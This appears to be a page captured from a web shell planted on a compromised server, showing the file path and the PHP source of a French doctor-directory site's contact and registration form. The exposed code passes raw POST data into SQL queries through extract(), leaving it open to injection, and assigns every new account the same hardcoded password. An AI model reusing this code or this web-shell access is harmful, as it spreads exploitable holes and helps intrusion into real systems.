?

áEÓê¤ÎïLwebshll2019

Current Path : /home/webyoo/www/backup/allback/docteur-site/save_2405bh/
Upload File :
Current File : /home/webyoo/www/backup/allback/docteur-site/save_2405bh/send_contact.php

<?php
 
include "start.php";
 
extract($_POST);

$pattern = '/^[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4}$/i';
			
if($objet == ''){
	echo "Veuillez remplir un objet!";
}else
{
	if($objet == 'medecin')
	{
		$sql = mysql_query("SELECT id FROM doc_specialites WHERE libelle='$recherche_spe_contact'");
		$row_spe = mysql_fetch_array($sql);
		$fk_specialite = $row_spe['id'];

		$sql = mysql_query("SELECT * FROM doc_villes WHERE libelle='$recherche_ville_contact'");
		$row_vil = mysql_fetch_array($sql);
		$fk_ville = $row_vil['id'];


		$sql = mysql_query("SELECT * FROM doc_medecins WHERE nom_fr='$nom_fr' AND prenom_fr='$prenom_fr' AND fk_specialite='$fk_specialite' AND fk_consultation like '%$fk_consultation%'");
		$row_cnt = mysql_num_rows($sql);
		// if($row_cnt>0){
			// echo "Vous êtes déjà inscrit!";
		// }else
		if($nom_fr=="" || $prenom_fr=="" ||  $fk_specialite=="" || $adresse=="" || $fk_ville=="" || $email=="" || $fk_niv_fr=="" || $fk_consultation==""){
			echo "Veuillez remplir correctement les champs obligatoires!";
		}else
		{
			
			if(preg_match($pattern, $email))//email ok
			{
				
				
				$sql_insert=mysql_query("INSERT INTO doc_medecins SET nom_fr='$nom_fr', prenom_fr='$prenom_fr', fk_specialite='$fk_specialite', adresse='$adresse', fk_ville='$fk_ville', tel_perso='$tel_perso', tel_fax='$tel_fax', tel_mobile='$tel_mobile', tel_rdv='$tel_rdv', email2='$email', fk_niv_fr='$fk_niv_fr', fk_consultation='$fk_consultation',  commentaires='$commentaires', active=0, date_inscription='".date("d-m-Y")."'");
				
				$lastid = mysql_insert_id();
				
				$prenom = substr($prenom_fr, 0, 2);
				$n = 101 + $lastid;
				$login = $prenom.$n;
				
				mysql_query("UPDATE doc_medecins SET login='$login', mdp='docteurs123' WHERE id=$lastid");
				
				echo "Votre inscription s'est terminée avec succès ! ";

			
				$headers = 'Mime-Version: 1.0'."\r\n";
				$headers .= 'Content-type: text/html; charset=utf-8'."\r\n";
				$headers .= 'From :contact@docteurs.co.il';
				$msg ="Bonjour Michael,<br>Le médecin ".$prenom_fr." ".$nom_fr.", ayant pour identifiant [$lastid] vient de s'inscrire sur le site. ";//ajouter id
				mail("docteurs.lesite@gmail.com,hmichael26@gmail.com","Site Docteurs.co.il - Inscription en ligne",$msg,$headers);
				$mess_prive='';
				if($fk_consultation=='||||5|'){$mess_prive="<Br><Br>Vous le savez sûrement, la présence dans notre base de données <u>est devenue payante</u> à partir du <b>14 juillet 2017</b>.
	 
	<Br><Br>Depuis cette date, vous devez souscrire à notre abonnement de <b>(29.9 NIS/mois)</b>.
	 
	<Br><Br>Pour souscrire à cet abonnement, vous pouvez directement cliquer sur le bouton ci-dessous :<br><br>
	<a href='https://docteurs.co.il/secure-payment/nouvel-abonnement.php?id=".$_GET['id']."' target='_blank'><img src='http://www.docteurs.co.il/img/bouton-abo.png' style='width:260px;'></a>

	<br><br>Ou nous contacter par mail : <a href='mailto:abonnements@docteurs.co.il'>abonnements@docteurs.co.il</a>
	 
	<Br><Br>En attendant votre retour nous vous souhaitons une activité florissante et une bonne réussite !";}
	else{
		$mess_prive = "Votre fiche sera mise en ligne sous 24h après vérification.<Br><br>Merci de votre confiance.<br>";
	}
				$msg_client = "Bonjour ".$prenom_fr." ".$nom_fr.",<br><br>Nous avons bien reçu votre demande d'inscription.$mess_prive<br><br>L'équipe Docteurs.";//si c prive ajouter 
				mail($email,"Site Docteurs.co.il - Inscription en ligne",$msg_client,$headers);
			}else{
				echo "Votre adresse email est incorrecte ! ";
			}
			//
		}
		
	}else
	{
		if($nom_fr=="" || $prenom_fr=="" ||  $email=="" || $commentaires=="" || strpos("x", $commentaires) !== false || strpos("select", $commentaires) !== false){
			echo "Veuillez remplir correctement les champs obligatoires!";
		}else
		{
			
			if(preg_match($pattern, $email))//email ok
			{
				
				$headers = 'Mime-Version: 1.0'."\r\n";
				$headers .= 'Content-type: text/html; charset=utf-8'."\r\n";
				$headers .= 'From :contact@docteurs.co.il';
				$msg ="Bonjour Michael,<br>Le médecin ".$prenom_fr." ".$nom_fr." vient de ";
				if($objet=='modif')
				{
					$msg .="faire une demande de modification de sa fiche. <br><br>Son email est : $email.<br><br>Voici les commentaires qu'il a laissé : <br><br>$commentaires";
					$detail_mess = "demande de modification de fiche";
				}else
				{
					$msg .="laisser un message sur le site.<br><br>Son email est : $email.<br><br>Voici les commentaires qu'il a laissé : <br><br>$commentaires";
					$detail_mess = "message";
				}
				
				mail("docteurs.lesite@gmail.com,hmichael26@gmail.com","Site Docteurs.co.il - Formulaire de contact",$msg,$headers);
				
				$msg_client = "Bonjour ".$prenom_fr." ".$nom_fr.",<br><br>Nous avons bien reçu votre $detail_mess.<br>Nous prendrons contact avec vous sous 24h.<Br><br>Merci de votre confiance.<br><br>L'équipe Docteurs.";
				
				mail($email,"Site Docteurs.co.il - Votre $detail_mess",$msg_client,$headers);
				
				echo "Votre message a été envoyé avec succès ! ";
			}else{
				echo "Votre adresse email est incorrecte ! ";
			}
			//
		}
	}
	
	
}

?>



web shell, Coded By 2019